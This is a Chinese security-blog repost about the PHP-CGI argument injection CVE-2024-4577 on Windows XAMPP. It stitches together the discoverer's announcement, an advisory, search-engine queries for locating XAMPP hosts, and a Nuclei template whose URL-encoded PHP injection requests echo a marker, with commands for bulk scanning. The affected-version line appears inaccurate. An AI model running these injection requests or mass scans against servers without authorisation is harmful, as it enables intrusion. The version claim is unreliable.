CVE-2024-4577 - 又一个 PHP RCE:让 PHP-CGI 参数注入再次伟大!
这是我在准备Black Hat USA演讲时发现的一个附带故事/额外漏洞。我相信大部分细节已经在官方公告中涵盖 (应该很快就会发布)。尽管随着时间的推移,PHP-CGI 已逐渐被淘汰,但此漏洞默认会影响Windows 版 XAMPP,允许未经身份验证的攻击者通过特定字符序列在远程 XAMPP 服务器上执行任意代码。
鉴于 PHP 和 XAMPP 在网络生态系统中的广泛使用,我敦促大家检查自己是否受到影响并相应地更新系统。请参阅DEVCORE 发布的安全警报 以了解缓解措施。
这个漏洞非常简单,但这也是它有趣的地方。谁会想到,一个经过 12 年审查并被证明安全的补丁,会因为Windows 的一个小功能而被绕过?我相信这个功能可能会导致更多的潜在漏洞。如果你使用这种技术,别忘了参考这篇文章!https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-ucoderef/d1980631-6401-428e-a49d-d71394be7da8😉
此漏洞由 DEVCORE (@d3vc0r3) 的 Orange Tsai (@orange_8361) 发现。请务必关注他的出色研究,我们的角色只是重现和开发此问题的漏洞。安全警报:CVE-2024-4577 PHP CGI 参数注入漏洞
概述 CVE-2024-4577 是 PHP 中的一个严重漏洞,影响 CGI 配置,允许攻击者通过精心设计的 URL 参数执行任意命令。
受影响的版本
- Windows 上使用 的 PHP 7.4.29 和 8.0.19 之前的版本php-cgi。
鹰图:
web.body="XAMPP"
Fofa:
product="XAMPP"
id: CVE-2024-4577 info: name: CVE-2024-4577 PHP CGI Argument Injection author: Hüseyin TINTAŞ severity: critical description: > CVE-2024-4577 PHP CGI Argument Injection Vulnerability. This template checks if the response contains "CVE2024_EXP_TEST_1337" indicating a successful injection. requests: - method: GET path: - "{{BaseURL}}/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE2024_EXP_TEST_1337\";?>" - "{{BaseURL}}/cgi-bin/php.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE2024_EXP_TEST_1337\";?>" - "{{BaseURL}}/php-cgi/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE2024_EXP_TEST_1337\";?>" - "{{BaseURL}}/php-cgi/php.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE2024_EXP_TEST_1337\";?>" - "{{BaseURL}}/index.php?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE2024_EXP_TEST_1337\";?>" matchers: - type: word words: - "CVE2024_EXP_TEST_1337"
nuclei -t CVE-2024-4577.yaml -u
nuclei -l XXXX.TXT -t CVE-2024-4577.yaml
https://github.com/huseyinstif/CVE-2024-4577-Nuclei-Template/tree/main
原文始发于微信公众号(Ots安全):CVE-2024-4577 - PHP CGI 参数注入漏洞批量(复现)Nuclei 模板
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论